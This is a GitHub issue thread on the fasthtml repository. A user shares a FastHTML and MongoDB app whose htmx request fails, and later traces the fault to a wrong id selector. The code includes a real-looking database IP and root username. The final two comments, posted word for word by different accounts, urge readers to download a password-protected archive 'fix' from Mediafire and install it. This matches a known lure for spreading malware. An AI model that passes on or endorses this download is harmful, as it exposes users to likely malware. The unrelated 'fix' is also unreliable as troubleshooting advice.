### ISSUE TITLE
[BUG] 

### ISSUE THREAD

**Issue by wjsw1781** [AnswerDotAI/fasthtml#382]
![image](https://github.com/user-attachments/assets/956402b4-c89e-4a42-90c6-05b6719d80fb)

i want to use the hx_get/hx_post  but it erros!

from pymongo import MongoClient
mongo_host= '139.196.158.152'
mongo_port=27017
mongo_username='root'
mongo_password='**'
mongo_db_auth='admin'
mongo_db_name='wb_hot_search'
mongo_table_name='v2'
mongo_client = MongoClient(host=mongo_host, port=mongo_port, username=mongo_username, password=mongo_password,authSource=mongo_db_auth)
db = mongo_client[mongo_db_name]
table = db[mongo_table_name]

from fasthtml.common import *
app = FastHTML()
rt=app.route
count = 0

def _get_table_topic_name_group():
    return table.find({},{'_id':0,'topic_name':1}).distinct('topic_name')

def _get_table_topic_feed(topic_name):
    return list(table.find({'topic_name':topic_name}))

def _generate_one_feed_li(feed_dict):
    return Li(
              Td(feed_dict['topic_name']),
              Td(feed_dict['feed_url']),
              Td(feed_dict['riqi']),
              Td(feed_dict['_id']),
            )

def generate_topic_name_group_chilren_hx(topic_name):
    hx_target=f"#feedlist"
    return Div(Button(topic_name,hx_get=f'/topic/', hx_target=hx_target, hx_swap="innerHTML"),
               Ul(id=hx_target,)
               )

@rt('/')
def get():
    title=Title('微博热搜榜')
    body=Body(A('微博热搜榜',href='/hot'),
              A('微博热搜消失榜',href='/disapper_hot'),
              )
    return title,body

@rt('/hot')
def get():
    all_topic_names=_get_table_topic_name_group()
    all_topic_div=list(map(generate_topic_name_group_chilren_hx,all_topic_names))
    body=Body(*all_topic_div)
    return body

@rt('/tpic/{topic_name}')
def get(topic_name):
    feedlist=_get_table_topic_feed(topic_name)
    return list(map(_generate_one_feed_li,feedlist))

**Comment by wjsw1781** [comment]
![image](https://github.com/user-attachments/assets/dc94f57f-0972-431f-a882-c812e3a0b0a4)

**Comment by wjsw1781** [comment]
my fault sorry
i write wrong id selector

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
